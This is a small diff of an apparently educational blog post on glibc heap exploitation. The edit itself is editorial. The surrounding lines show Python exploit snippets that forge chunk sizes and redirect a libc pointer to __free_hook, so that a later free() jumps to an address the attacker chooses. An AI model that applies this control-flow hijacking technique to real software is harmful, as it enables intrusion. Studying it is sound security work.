arget13/arget13.github.io/_posts/2023-03-23-taking-a-leak.md

 # Make the chunk #2 of size > maxfast (e. g.
 0xa0)
 edit(4, p64(0) + p64(0x80) + p64(0))
 ```
-Easy.

-By editing the contents of the last allocated chunk we would be overwriting `__free_hook`, and thus the next call to free() would jump to whatever address we place there.
+By editing the contents of the last allocated chunk we would be overwriting `__free_hook`, and thus the next call to `free()` would jump to whatever address we place there.
 ```python
 # Make fwd pointer in our chunk (which points to libc) point to __free_hook
 edit(2, p64(0x2268) + p64(0) * 2)